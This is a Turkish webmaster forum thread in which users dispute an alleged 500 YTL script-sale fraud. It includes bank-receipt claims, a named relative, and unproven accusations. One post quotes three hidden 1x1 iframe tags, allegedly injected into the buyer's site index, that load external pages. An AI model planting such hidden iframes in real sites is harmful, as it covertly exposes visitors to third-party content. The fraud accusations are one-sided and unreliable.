İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

Arkadaşlar DİKKAT YUZUK.ORG SAHİBİ DOLANDIRICIDIR!!!

cpa

0
İyinet Üyesi
Reaction score
0
Benim konuyla alakam yok fakat işin şurasını anlayamadım. Anladığım kadarıyla [DeviL], sen ya da abin parayı alacak kişisiniz. Makbuz ve fatura istedim diyorsun. Ama burada bu kişi müşteri. Müşterinin makbuz, fatura kestiği nerede görülmüş? Faturayı malı satan kişi keser, tabi eğer vergi levhası varsa. Müşteri sadece dekontu gönderebilir, fatura kesmesi mantıksız. suikast nickli arkadaş maillere 2 kez dekontu gönderdiğini, parayı yatırdığını kanıtlayabileceğini söylüyor. Ayrıca, suikast nickli şahıs, senin hakkında dolandırıcıdır şeklinde iddiada bulunan 2. kişi. Hatırlatmak istedim. Bence olaydan elini çekeceğine, benimle muhattap değilsin abimle muhattapsın diyeceğine kendini temize çıkarmaya çalışsan daha iyi olur yoksa durum kötüye gidiyor kimsenin sana güveni kalmaz bu gidişle.

M

Maxi

Misafir
Valla Batuhan ;
Herkes yalan söyler, Umit yalan söylemez.
Dolayısıylaaaaa bileeeemiyoruuuum :)

123mp3

0
İyinet Üyesi
Reaction score
0
suikast dekontu yolladınmı? Ayrıca bu [devil] senin adın "V" ile başlıyorsa bu olayın senle alakası yoktur. mutlaka ortalığı birisi bulandırdı!

S

suikast

Misafir
dekont

olayın seninle alakası şudur

EFT yi yaptığım şahıs senin annen Cahide Ekşi , burak i da bana benim abim diye tanıttın benden mi aldın diyorsun script i ?

ayrıca sana verdiğim kontrol panel bilgileriden girip sitemin ftp loginin değiştirip

sitemin index ine bu bilgileri yazmışsın

<iframe src='http://www.sizinle.com/yuzuk/deneme.php' width='1' height='1' border='0'></iframe>
<iframe src='http://www.sizinle.com/yuzuk/tatlises/deneme.php' width='1' height='1' border='0'></iframe>
<iframe src='http://www.yuzuk.org/toplist' width='1' height='1' border='0'></iframe>

bunlar sanırım seninle alakalı şeyler hep ,

Hukuki işlemler için neden bu kadar sert çıktın anlamadım madem para sizde değil neden kendini bir dolandırıcı gibi savundun ?

para sizde şimdi dekontu ekliycem referans numarasından herşeyine kadar annen yarın arasın bankayı..

buyrun dekontta http://www.suikast.net/dekontt.gif bakalım şimdi ne diyeceksiniz merak ediyorum ben paramın tarafıma iade edilmesini istiyorum !

attığım emaillerin hiçbirine yanıt bile vermedin ,

123mp3

0
İyinet Üyesi
Reaction score
0
suikast sen neden iş yaptığın adamın ismine değilde başka birinin ismine atıyorsun parayı?devil para annenin hesabındaysa suikaste öde, bu işten kurtulun!

S

suikast

Misafir
Devil dekont üzerindeki rakamlar photoshop değil , referans numarası var eft nin !

iyi bak!

para devil in annesinin hesabında amma abisi 1 Lira yok diyor hesapta anlamadım gitti!

dewilsdance

0
İyinet Üyesi
Reaction score
0
ikinizide tanımam etmem ama ;
1- dekont gercekten cok yapay duruyor daha iyisinide yapabilirim
2- numarasından herhangi bir garanti bankasından kontrol edilebilir..

M

Maxi

Misafir
[DeviL]' Alıntı:
benim soy adım Ekşioğlu onun sülalesini satın alırım yinede zorlanmam maddi açıdan
Güzelim Batuhan ;
Bendende bir domain alacaktın. Çarşamba halledelim demiştin. Nice çarşambalar geçti. Salı günü "halledelimmi?" dedim.
"Param yok" dedin..
Şimdi sakın "Domaini almak istemediğim için öyle dedim" demeyesin. Dahada ufalma yani :)

S

suikast

Misafir
Arkadaşlar ben 500 YTL kaptırdım bu adama cebimden çıkan bir miktar bu olmayan göndermediğim bir parayı geri almaya çalışmam herhalde !

Adamlar Dolandırıcı işte görmüyormusunuz Dekont photoshop diyor , yok abimle iş yaptın diyor ,

bu parayı bana göndereceksin devil !

dewilsdance

0
İyinet Üyesi
Reaction score
0
Bu arada daha once başıma gelmiş bir olayı anlatmak istiyorum:

- Bir kullanıcıya para gondermem gerekıyordu Kocbank -> Garanti Bankası

koc banka gittim parayı yatırdım makbuzumu aldım.
karsımdakıne dogal olarak odemenin gitmiş oldugunu sandım. Ancak gitmemis. Karsımdekıne yollaması gereken urunlerı neden yollamadıgını sordum" ödeme gelmedi " dedi.. aptal oldum tabii salak yerine koyuldugumu sandım .. dekontu yolladım.. daha sonra ogrendik ki .. transfer gerceklestırılememıs. ve sen belirli bir sure itiraz edene kadar gecici hesapta kalıyormus sizin adnıza. (yollayan) .. belli sure sonra haber veriyomus banka yetkilileri..

bence oncelikle bankanızı arayıp bir ogrenın ..bu olay 1 kez basıma geldi ( gunden en az 4 eft yapıyorum )

sizinde gelmiş olabilir.. bosuna birbirinizi kırmayın

relax

0
İyinet Üyesi
Reaction score
0
dekontun bence ps ile alakası yok garantinin internet bankacılığında böyle bir e-dekont hizmeti olması lazım.

orda sıra no var herşey var suikast bence çok kolay yolla bunu halledebilirsin yasalar senden yana.

birde devil annenin hesabını iyi kontrol et elma hesabı açtırmışsa eğer para direk oraya gider garanti internet bankacılığında böyle bişey var kimse bilmiyo para uçtu zannediyo

annenin elma hesabına bak eğer para geldiyse orda görceksin bence.

hadi iyi elma şekerleri..

S

suikast

Misafir
Arkadaşım benim Garanti bankası internet bankacılığı hesabım var online para akışlarını anlık görebiliyorum ,

salı günü sırf bu olay için Çorlu Garanti bankasına gitti müşteri temsilcime durumu anlattım savcılığa başvuruda bulunabilirsin dedi , dedim ki acaba gitmemiş olabilir mi para benden çıkmış gözüküyor ?

Ergül bey , istanbul u aradı ve oradaki bir bey ile görüştüm dekontumun referans numarasını verdim kendisine , tamam ben kontrol edicem dedi 1 gün içinde para hesabınızda olur bir yanlışlık varsa dedi..sürekli hesabıma bakıyorum herhangi bir geri ödeme yok!!!

Adamlar hortumladılar parayı , sonra ben almadım bana gelmedi diyorlar ghost_burak neden ümit i de ignore ettin ?

W

w0w

Misafir
[DeviL]' Alıntı:
Maxi Arkadaşım Anlamıyorsun Galiba Gelsinler Yazsınlar Benimle mi Anlaşmışlar Yahu ben yapmış oLsam ben parayı almış olsam benimle anlaşmış olsa buraya gelip yazmam ki kimden korkucam burada 3-5 tane site sahibi andavala rezil olucam da ne olacak hangi mahkemeyle ne alabilrki yapmış olsam ama benimle bi anlaşması yok abimle kuzenimle anlaşması var ben istanbulda değildim çanakkaledeydim günde 1 saat giriyordum yada 2 saat oradan [email protected] son gelişmeleri bilmiyorum kuzenime ulaşamıyorum şuanda daha gece 11 de geldim msn i açtığım gibi Fuat abinin gazabına uğradım gelsinler yazsınlar benimle mi abimle mi anlaşmışlar...

andavalın anlamını biliyomusun merak ettim? Daha önce hakkında kaç tane konu açıldı dolandırıcı diye. Annem avukat diyorsun bide sanırım fazla birşey öğretmemiş dürüstlükle ilgili. Benim yada başka biri hakkında neden böyle konular açılmıyor da senin hakkında açılıyor. Kimseye de hakaret etmeye hakkın yok adam sana dekont gösteriyor photoshop diyorsun getirse eline verse wordde yazmışın dersin. İnandırmak için başbakan falan lazım heralde. Laflarına da dikkat et.

caper

0
İyinet Üyesi
Reaction score
0
suikast; sen anlaşma falan imzalamadıysan paranı geri alabilir misin? Sonuçta parayı kendi rızanla göndermişsin. Atıyorum, adam ben yaptım işi der.

Buarada devil abimle anlaştın diyip duruyosun, saat 3 olsada abine haber vermen lazım bence böyle bi olayda. Ortda 500 ytl var hadi onu bırak madem ben yapmadım diosun sana olan güven sarsılacak (zaten sarsıldı hatta yıkıldı ama sorunla alakan yoksa abine haber, zararın nersinden dönersen kardı)

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5

seo ajansı , sosyal medya yönetimi